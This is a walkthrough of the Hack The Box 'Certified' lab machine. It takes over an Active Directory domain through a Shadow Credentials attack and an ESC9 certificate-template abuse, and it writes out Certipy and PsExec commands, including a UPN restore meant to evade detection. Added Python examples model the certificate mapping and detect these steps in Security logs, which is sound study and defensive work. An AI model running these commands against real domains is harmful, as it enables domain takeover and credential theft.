
Hack The Box: Certified Machine Walkthrough – Medium Difficulty

Introduction to Certified:


This writeup explores the “Certified” machine from Hack The Box, a medium-difficulty challenge. It covers reconnaissance, exploitation, and privilege escalation steps needed to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Certified” machine from Hack The Box. To achieve this, we will systematically follow a structured approach while addressing key objectives, ensuring efficiency and clarity throughout the process.

User Flag:

Initial Access

The initial foothold is obtained using the credentials judith.mader:judith09, which enable authentication and enumeration of network resources. With that access established, we can proceed with privilege escalation techniques.

Privilege Escalation to Management Account

To escalate privileges, Certipy is utilized to perform a Shadow Credentials attack, specifically targeting the management_svc account. This attack manipulates authentication settings, ultimately granting control over the targeted account. Once the necessary credentials are obtained, Evil-WinRM is used to establish a remote session with the machine by leveraging NTLM hashes.

Finally, we can retrieve the user flag by executing the following command:

type user.txt

Root Flag:

Exploiting Certificate Services for Privilege Escalation

The next phase involves Active Directory Certificate Services (AD CS) exploitation. This attack begins by modifying the User Principal Name (UPN) of the ca_operator account to Administrator using Certipy. Consequently, this allows us to request a certificate under the Administrator identity, effectively granting elevated privileges.

After altering the UPN, the next step is to request a vulnerable ESC9 certificate. Notably, by omitting ca_operator’s original domain, the issued certificate lacks the Security Identifier (SID) linking it to ca_operator, making it functionally equivalent to an Administrator certificate.

Once the certificate is successfully obtained, the UPN of ca_operator is restored to its original state to minimize detection. The newly acquired certificate is then used to authenticate with Kerberos, thereby retrieving the NT hash of the Administrator account.

To confirm privilege escalation, the root flag is retrieved by executing the following command:

type root.txt

Enumerating the Certified Machine

Reconnaissance:

Nmap

Nmap Scan:

A network scan is initiated to identify open ports and running services on the target machine.

nmap -sC -sV -oN nmap_initial.txt 10.10.11.41

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/certified]
└──╼ $nmap -sC -sV -oA initial -Pn 10.10.11.41
# Nmap 7.94SVN scan initiated Thu Mar 13 06:10:04 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.17s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-13 17:10:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-13T17:11:44+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-13T17:11:45+00:00; +7h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-13T17:11:44+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-13T17:11:45+00:00; +7h00m00s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-03-13T17:11:04
|_  start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 13 06:11:46 2025 -- 1 IP address (1 host up) scanned in 101.72 seconds

Key Findings from Nmap Scan:

  • 53/tcp (DNS) – Simple DNS Plus is running, likely providing name resolution for the domain.
  • 88/tcp (Kerberos) – Kerberos authentication is active, confirming a Windows domain controller.
  • 135/tcp (MSRPC) & 593/tcp (RPC over HTTP) – Remote procedure calls (RPC) for Windows services and administrative tasks.
  • 139/tcp & 445/tcp (SMB/NetBIOS) – File sharing and authentication mechanisms, potentially exploitable for SMB relay or credential theft.
  • 389/tcp & 636/tcp (LDAP & LDAPS) – Active Directory LDAP services are available for querying domain objects, with 636/tcp supporting secure connections (SSL).
  • 464/tcp (kpasswd5) – Used for Kerberos password changes, indicating password management capabilities for domain users.
  • 3268/tcp & 3269/tcp (Global Catalog LDAP) – Active Directory Global Catalog ports facilitate domain-wide searches.
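One detail in the scan above that is easy to skip past is the clock-skew line: the target's clock is almost seven hours ahead of the scanner, which is far outside the five-minute tolerance Kerberos allows, so every Kerberos-based step later on (PKINIT, Certipy authentication) only works once the attacking host's time is aligned with the DC. The parser below is an added example written for this page (it is not part of the original walkthrough or of Nmap); it pulls the domain, the DC hostname, the open ports and the skew out of the excerpt of the scan output embedded in it, strips the trailing "0." that Nmap prints after the LDAP domain, and reports whether the skew is within Kerberos tolerance. The five-minute limit is the default Windows KDC tolerance; the domain-name regex (an all-letter last label) is a heuristic that assumes lab-style DNS names.

```python
import re

# Excerpt of the Nmap output from the walkthrough, embedded so the parser runs offline.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.11.41
Host is up (0.17s latency).
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-13 17:10:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
445/tcp  open  microsoft-ds?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
"""

HOST_RE = re.compile(r"Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
# Nmap prints the LDAP-advertised domain with a trailing "0." (certified.htb0.);
# requiring an all-letter last label drops that artifact. Heuristic for lab DNS names.
DOMAIN_RE = re.compile(r"Domain:\s*([A-Za-z0-9-]+(?:\.[A-Za-z-]+)+)")
CN_RE = re.compile(r"commonName=([^\s,]+)")
DURATION_RE = re.compile(r"^(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$")

KERBEROS_MAX_SKEW = 300  # seconds; default clock tolerance of a Windows KDC


def parse_duration(value):
    """Convert an Nmap duration such as '6h59m59s' or '-5m' into signed seconds."""
    m = DURATION_RE.match(value.strip())
    if not m:
        raise ValueError(f"unrecognised duration: {value!r}")
    sign, hours, minutes, seconds = m.groups()
    total = int(hours or 0) * 3600 + int(minutes or 0) * 60 + int(seconds or 0)
    return -total if sign else total


def parse_scan(text):
    """Extract host, open ports, AD domain, DC hostname and clock skew from -sC -sV output."""
    result = {"host": None, "open_ports": {}, "domain": None,
              "dc_hostname": None, "clock_skew_seconds": None}
    for line in text.splitlines():
        line = line.strip()
        if (m := HOST_RE.search(line)):
            result["host"] = m.group(1)
        elif (m := PORT_RE.match(line)):
            port, _proto, service, version = m.groups()
            result["open_ports"][int(port)] = service
            if result["domain"] is None and (d := DOMAIN_RE.search(version)):
                result["domain"] = d.group(1)
        elif "ssl-cert:" in line and (m := CN_RE.search(line)):
            # First certificate CN seen is the DC's own name.
            result["dc_hostname"] = result["dc_hostname"] or m.group(1)
        elif "clock-skew:" in line:
            mean = re.search(r"mean:\s*(\S+?)(?:,|$)", line)
            result["clock_skew_seconds"] = parse_duration(mean.group(1))
    ports = result["open_ports"]
    # Kerberos + LDAP + Global Catalog together are the signature of a domain controller.
    result["is_domain_controller"] = all(p in ports for p in (88, 389, 3268))
    skew = result["clock_skew_seconds"]
    result["kerberos_time_ok"] = skew is not None and abs(skew) <= KERBEROS_MAX_SKEW
    return result


if __name__ == "__main__":
    summary = parse_scan(NMAP_OUTPUT)
    for key, value in summary.items():
        print(f"{key:22} {value}")
    if not summary["kerberos_time_ok"]:
        print("clock skew exceeds Kerberos tolerance: sync time with the DC before Kerberos steps")
```

Running it on the embedded excerpt reports certified.htb / DC01.certified.htb, a skew of 25199 seconds and kerberos_time_ok False, which is the cue to fix the local clock before any ticket request.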

Exploitation on Certified Machine

Hack The Box provides the following credentials for this machine; they are the starting point for enumeration and privilege escalation.

  • Username: judith.mader
  • Password: judith09

crackmapexec enumeration


Gathering Credentials Using CrackMapExec

We leverage CrackMapExec with the SMB module to enumerate users.

Identified Usernames:

Administrator
Guest
krbtgt
DC01$
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron

Using BloodHound for Privilege Escalation Analysis

BloodHound is used to analyze the extracted data and identify potential attack paths and privilege escalation opportunities.

Analysis using BloodHound on Certified Machine


The BloodHound collection command retrieves the domain objects and their relationships from the machine for analysis.

Modify the ACL of the Management group to grant the user judith.mader the WriteMembers permission, allowing them to manage the group’s members.

What is DACLedit?

DACLs manage permissions for objects like files, folders, and Active Directory components. They can be modified through the use of:

  • PowerShell (Set-Acl, icacls, dsacls)
  • Graphical interfaces (Active Directory Users and Computers, Advanced Security Settings)
  • Third-party utilities for permission management

Enumeration on Certified Machine


Modifying ACLs Using Impacket

Using Impacket, we modify the DACL of the MANAGEMENT group in Active Directory, granting Judith Mader permission to manage group membership. This is done by assigning the WriteMembers privilege.

Key Steps:

  • Modify Group Membership – Enables privilege escalation.
  • Grant WriteMembers Permission – Allows Judith to modify the group members.
  • Authenticate Using Judith’s Credentials – Provides necessary authorization.

First, retrieve the management_svc credentials using a Shadow Credentials attack. After obtaining these credentials, leverage them along with the associated hash to escalate privileges. Ultimately, this progression enables the successful targeting of ca_operator.

Trying the enumeration using pywhisker and the gettgtpkinit script


Next, request a TGT (Ticket Granting Ticket) for management_svc.


Use the appropriate script from PKINITtools, gettgtpkinit.py, to request a Kerberos TGT by leveraging the previously generated certificate and key.

Alternative Methods: Certipy for AD CS Exploitation

To overcome specific challenges, an alternative approach involves leveraging Certipy to exploit Active Directory Certificate Services (AD CS). Certipy allows for:

  • Obtaining an administrator certificate to escalate privileges.
  • Requesting a Kerberos TGT using a previously generated certificate.
  • Performing a Shadow Credentials Attack to manipulate authentication settings.

A little explanation on the Certipy script

Certipy is a security tool designed for assessing Active Directory Certificate Services (AD CS). It helps penetration testers systematically enumerate, request, and exploit misconfigured certificates for privilege escalation. Often utilized as an alternative to PKINITtools, Certipy plays a crucial role in identifying and leveraging weaknesses in certificate-based authentication within Active Directory.


Certipy can be utilized to execute a Shadow Credentials attack, which, in turn, allows an attacker to modify authentication settings and, consequently, gain access to another user’s account. Furthermore, by first authenticating as Judith Mader (judith.mader@certified.htb, password: judith09), the attacker can then strategically target the management_svc account, thereby gaining control and further escalating privileges.

We can use Evil-WinRM along with the previously obtained username and hashes to gain access to the machine.

We can retrieve the user flag by executing the command type user.txt in the terminal.

Escalate to Root Privileges Access on Certified Machine

Privilege Escalation:

The management_svc account has full administrative control over the ca_operator account, granting it the ability to manage and modify that account's permissions, settings, and associated resources.

Certipy deeper exploitation


This step uses Certipy to interact with Active Directory Certificate Services (AD CS), authenticating as management_svc@certified.htb with the account's NT hash. By targeting the ca_operator account, it obtains certificate-related control over that account, which allows the creation or manipulation of authentication certificates. The target system, 10.10.11.41, is the domain controller that manages network authentication.

With full control over the ca_operator account, we proceed with the final privilege escalation steps:

  • Modify the UPN of ca_operator to Administrator:
    • certipy-ad account update -username management_svc@$domain -hashes :$svcHash -user ca_operator -upn Administrator
  • Request a vulnerable certificate:
    • certipy-ad req -username ca_operator@$domain -hashes :$caHash -ca certified-DC01-CA -template CertifiedAuthentication -debug
  • Authenticate using the obtained certificate and retrieve the NT hash:
    • certipy-ad auth -pfx administrator.pfx -domain $domain
  • Use PsExec for remote execution on the Domain Controller (DC01):
    • psexec \\dc01 -u Administrator -H <NTLM Hash> cmd.exe
  • Retrieve the root flag:
    • type root.txt

To modify the User Principal Name (UPN) of the ca_operator account to Administrator, execute the following command:

certipy-ad account update -username management_svc@$domain -hashes :$svcHash -user ca_operator -upn Administrator

This command updates the UPN associated with the ca_operator account, effectively changing its identity to Administrator within the domain.


To request a vulnerable certificate using the ca_operator account, we utilize the CertifiedAuthentication certificate template.

certipy-ad req -username ca_operator@$domain -hashes :$caHash -ca certified-DC01-CA -template CertifiedAuthentication -debug

Since the User Principal Name (UPN) of ca_operator was previously modified to Administrator, the requested certificate is issued with the Administrator’s UPN. Additionally, by omitting the original ca_operator domain, the resulting certificate is generated without the Security Identifier (SID) of ca_operator. This approach allows for the creation of a certificate that effectively grants elevated privileges under the Administrator identity, bypassing standard security controls and avoiding direct association with the original ca_operator account.
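The reason the issued certificate can pass as Administrator is worth making concrete. Since KB5014754, a CA normally embeds the requester's SID in the certificate (extension OID 1.3.6.1.4.1.311.25.2), and the KDC checks that SID against the account the SAN resolves to; ESC9 relies on a template whose msPKI-Enrollment-Flag carries CT_FLAG_NO_SECURITY_EXTENSION (0x80000), so no SID is embedded and only the UPN is left to identify the account. The Python model below is an added example written for this page, not Certipy's or Microsoft's code: the OID and flag value are real, but the SIDs are constructed, the directory is two in-memory accounts, and the UPN lookup (explicit userPrincipalName, then sAMAccountName as the implicit UPN) is a simplification of the KDC's real name resolution. It replays the walkthrough's UPN swap under the StrongCertificateBindingEnforcement registry setting's three modes and shows that the ticket maps to Administrator only while the SID extension is absent and enforcement is not set to 2.

```python
from dataclasses import dataclass, field
from typing import Optional

# Real OID of the SID security extension (szOID_NTDS_CA_SECURITY_EXT, KB5014754).
SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"
# Real msPKI-Enrollment-Flag bit that stops the CA from embedding that extension.
CT_FLAG_NO_SECURITY_EXTENSION = 0x80000

DOMAIN = "certified.htb"


@dataclass
class Account:
    sam: str
    sid: str   # constructed sample SIDs, not the real machine's
    upn: str


@dataclass
class Certificate:
    san_upn: str
    extensions: dict = field(default_factory=dict)   # OID -> value


class Directory:
    """Minimal stand-in for the DC's account lookups."""

    def __init__(self, accounts):
        self.accounts = {a.sam: a for a in accounts}

    def by_upn(self, upn: str) -> Optional[Account]:
        # Simplified model: explicit userPrincipalName first, then the implicit
        # UPN formed from sAMAccountName (with or without a domain suffix).
        for a in self.accounts.values():
            if a.upn.lower() == upn.lower():
                return a
        name = upn.split("@")[0].lower()
        return next((a for a in self.accounts.values() if a.sam.lower() == name), None)


def issue(template_flags: int, requester: Account) -> Certificate:
    """Model of CA issuance: the SAN UPN is copied from the requester's *current*
    UPN, and the SID extension is embedded unless the template opts out."""
    ext = {}
    if not template_flags & CT_FLAG_NO_SECURITY_EXTENSION:
        ext[SID_EXTENSION_OID] = requester.sid
    return Certificate(san_upn=requester.upn, extensions=ext)


def map_certificate(directory: Directory, cert: Certificate, enforcement: int):
    """Model of KDC mapping under StrongCertificateBindingEnforcement:
    0 = disabled, 1 = compatibility (weak mappings allowed, warning logged), 2 = full."""
    acct = directory.by_upn(cert.san_upn)
    if acct is None:
        return None, "no-account"
    sid = cert.extensions.get(SID_EXTENSION_OID)
    if sid is not None:
        # Strong mapping: the embedded SID must belong to the account the SAN resolved to.
        return (acct.sam, "strong-mapping") if sid == acct.sid else (None, "sid-mismatch")
    if enforcement >= 2:
        return None, "no-strong-mapping"   # full enforcement rejects SID-less certificates
    return acct.sam, "weak-mapping"        # accepted on UPN alone


def run_scenario(template_flags: int, enforcement: int, tamper_upn: bool = True):
    """Replay the walkthrough's UPN swap against a fresh directory and return
    the (mapped account, reason) pair the KDC model produces."""
    admin = Account("Administrator", "S-1-5-21-1-2-3-500", f"administrator@{DOMAIN}")
    ca_op = Account("ca_operator", "S-1-5-21-1-2-3-1105", f"ca_operator@{DOMAIN}")
    directory = Directory([admin, ca_op])
    original_upn = ca_op.upn
    if tamper_upn:
        ca_op.upn = "Administrator"        # certipy account update ... -upn Administrator
    cert = issue(template_flags, ca_op)    # certipy req ... -template CertifiedAuthentication
    ca_op.upn = original_upn               # UPN restored before authenticating
    return map_certificate(directory, cert, enforcement)


if __name__ == "__main__":
    print("ESC9 template, compatibility mode :", run_scenario(CT_FLAG_NO_SECURITY_EXTENSION, 1))
    print("ESC9 template, full enforcement   :", run_scenario(CT_FLAG_NO_SECURITY_EXTENSION, 2))
    print("SID extension present, UPN swapped:", run_scenario(0, 1))
    print("SID extension present, honest req :", run_scenario(0, 2, tamper_upn=False))
```

The four runs give the defender's checklist in one screen: the swap succeeds only in the first case, and either fix (clearing the NO_SECURITY_EXTENSION flag on the template, or moving the KDC to full enforcement) closes it, while honest enrolment still maps cleanly.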

Comprehensive Guide to Privilege Escalation


With the certificate issued, the User Principal Name (UPN) of the ca_operator account is restored to its original value, so the account is left looking untouched:

certipy-ad account update -username management_svc@$domain -hashes :$svcHash -user ca_operator -upn ca_operator@certified.htb -dc-ip 10.10.11.41

This command resets the UPN of ca_operator to ca_operator@certified.htb, undoing the earlier change to Administrator while the already-issued certificate keeps the Administrator UPN.
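Both the Shadow Credentials step (a write to msDS-KeyCredentialLink on management_svc by judith.mader) and the UPN set-then-restore on ca_operator leave a recognisable trace in the Domain Controller's Security log when directory service change auditing is enabled. The script below is an added detection example written for this page, not part of the walkthrough or of any vendor product. The events are constructed samples whose fields mirror those of Security event 4738 (A user account was changed, where User Principal Name reads "-" unless the UPN changed) and 5136 (A directory service object was modified); the thirty-minute revert window and the privileged-name list are assumptions to tune per environment. It flags a UPN that no longer matches the account's own name (noting whether it was put back shortly afterwards) and a KeyCredentialLink write made by anyone other than the object itself or a machine account.

```python
from datetime import datetime, timedelta

PRIVILEGED_NAMES = {"administrator"}      # names whose appearance in a UPN is high-signal
REVERT_WINDOW = timedelta(minutes=30)     # assumption: how quickly a set/restore pair occurs


def t(hhmm):
    return datetime(2025, 3, 13, int(hhmm[:2]), int(hhmm[3:]))


# Constructed sample events modelled on the fields of Security events 4738 and 5136.
EVENTS = [
    {"EventID": 5136, "Time": t("10:00"), "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 4738, "Time": t("10:05"), "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "Administrator"},
    {"EventID": 4738, "Time": t("10:06"), "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "-"},
    {"EventID": 4738, "Time": t("10:12"), "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "ca_operator@certified.htb"},
    {"EventID": 4738, "Time": t("11:00"), "SubjectUserName": "Administrator",
     "TargetUserName": "harry.wilson", "UserPrincipalName": "harry.wilson@certified.htb"},
    {"EventID": 5136, "Time": t("11:30"), "SubjectUserName": "DC01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
]


def upn_local_part(upn):
    return upn.split("@")[0].lower()


def detect_upn_swaps(events):
    """Flag UPN changes whose new value does not match the target account's own
    name, and record whether the value was restored within REVERT_WINDOW."""
    changes = [e for e in events
               if e["EventID"] == 4738 and e.get("UserPrincipalName", "-") != "-"]
    alerts = []
    for i, e in enumerate(changes):
        target = e["TargetUserName"].lower()
        new_local = upn_local_part(e["UserPrincipalName"])
        if new_local == target:
            continue                          # UPN consistent with the account: benign
        reverted = any(
            later["TargetUserName"].lower() == target
            and later["Time"] - e["Time"] <= REVERT_WINDOW
            and upn_local_part(later["UserPrincipalName"]) == target
            for later in changes[i + 1:])
        alerts.append({"rule": "upn-impersonation", "target": e["TargetUserName"],
                       "new_upn": e["UserPrincipalName"], "by": e["SubjectUserName"],
                       "privileged_name": new_local in PRIVILEGED_NAMES,
                       "reverted": reverted})
    return alerts


def detect_key_credential_writes(events):
    """Flag msDS-KeyCredentialLink writes by someone other than the object itself
    or a machine account: the shape a Shadow Credentials attack leaves behind."""
    alerts = []
    for e in events:
        if e["EventID"] != 5136 or e["AttributeLDAPDisplayName"].lower() != "msds-keycredentiallink":
            continue
        target = e["ObjectDN"].split(",")[0].split("=", 1)[1]
        subject = e["SubjectUserName"]
        if subject.endswith("$") or subject.lower() == target.lower():
            continue
        alerts.append({"rule": "shadow-credentials", "target": target, "by": subject,
                       "operation": e["OperationType"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_upn_swaps(EVENTS) + detect_key_credential_writes(EVENTS):
        print(alert)
```

On the sample data the UPN rule fires once, for ca_operator renamed to Administrator by management_svc and restored seven minutes later, and the KeyCredentialLink rule fires once, for judith.mader writing to management_svc; the machine account's own write and the ordinary UPN update on harry.wilson stay quiet.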


To successfully authenticate with the obtained certificate and subsequently retrieve the Administrator’s NT hash, you need to execute the following command.

certipy-ad auth -pfx administrator.pfx -domain $domain

Using the tool, authenticate to Kerberos as a user by leveraging a certificate file.

Getting root flag on Certified Machine


This step runs PsExec for remote execution on the Domain Controller (DC01). It explicitly designates the Administrator account for authentication and uses the NTLM hash recovered in the previous step rather than a plaintext password.


We can retrieve the root flag by executing the command type root.txt in the terminal.